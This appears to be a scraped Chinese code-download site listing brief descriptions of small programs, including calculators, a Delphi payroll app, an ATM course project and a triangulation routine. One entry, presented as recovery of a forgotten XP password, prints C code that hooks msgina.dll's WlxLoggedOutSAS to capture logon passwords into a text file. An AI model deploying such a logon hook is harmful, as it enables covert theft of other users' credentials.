-
一个小型的保存和读取文件的小程序,用VC编写,通过把对话框的数据同步显示在视图中,并可把此数据保存成文件和读取该文件,有四个小计算程序,求阶乘,求平均值,求最大...
一个小型的保存和读取文件的小程序,用VC编写,通过把对话框的数据同步显示在视图中,并可把此数据保存成文件和读取该文件,有四个小计算程序,求阶乘,求平均值,求最大值和交换值.-Preservation and a small applet to read the document, prepared by VC, through the dialog box is displayed in the data synchronization view, and the preservation of this data into a file and read the documents, there are four small computer program, and factorial, and the average order value and exchange value.
- 2022-11-09 12:05:04下载
- 积分:1
-
dephi和access的数据库编程
可以计算工资和报表功能以及打印
dephi和access的数据库编程
可以计算工资和报表功能以及打印-Delphi and database access programming can calculate the wages and reporting capabilities, as well as print
- 2023-01-02 11:15:05下载
- 积分:1
-
简易VC计算器,除简单算术运算外还可以计算表达式
简易VC计算器,除简单算术运算外还可以计算表达式-simple calculator, in addition to simple arithmetic operations, also can calculate the expression
- 2022-01-22 14:38:05下载
- 积分:1
-
花了几十块钱买的企业的网站,可后台添加数据,前台显示,很好用。...
花了几十块钱买的企业的网站,可后台添加数据,前台显示,很好用。-Spent money to buy dozens of businesses block the site, very good use.
- 2023-05-03 23:55:04下载
- 积分:1
-
课程设计 ATM机实现
模拟在现实中利用atm机,银行储户可以进行开户、存款、取款、转账、查询以及修改用户密码等银行业务。 给用户提供功能界面,根据用户的选择进入相应的模块执行对应的功能,程序不但要能完成开户、存款、取款、转账、查询以及修改用户密码等银行业务等功能,还应提供简洁友好的操作界面,适当的提示信息,使程序能在各个模块之间方便的跳转,并具有一定的容错性。其中各个账户的数据用文件记录,并能在程序运行过程中正确的读写,以实现数据的更新和存储。
- 2022-05-29 12:03:26下载
- 积分:1
-
构建三角网的VB程序,构建三角网的算法很多,这是逐点插入法,并在插入后进行外接圆检测,构成最有三角网...
构建三角网的VB程序,构建三角网的算法很多,这是逐点插入法,并在插入后进行外接圆检测,构成最有三角网-Triangulation algrithms for VB, it is Point Insertion algrithms, and detect the circumcircle after inserted, then make the best Triangulation.
- 2022-04-29 07:01:31下载
- 积分:1
-
小游戏(算命)
一个小游戏(算命先生)
-A small game (fortune teller)
- 2022-04-07 22:18:03下载
- 积分:1
-
高精度计算,实现完全256位的精度4则运算
高精度计算,实现完全256位的精度4则运算-High-precision calculation, 256 fully realize the accuracy of four computing
- 2023-02-28 10:05:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
CVI编写的程序,便于程序员对CVI进行深入的了解.此例子比较精典...
CVI编写的程序,便于程序员对CVI进行深入的了解.此例子比较精典-CVI prepared by the procedure to facilitate the CVI programmers in-depth understanding. Classical example of this comparison
- 2023-05-14 08:50:03下载
- 积分:1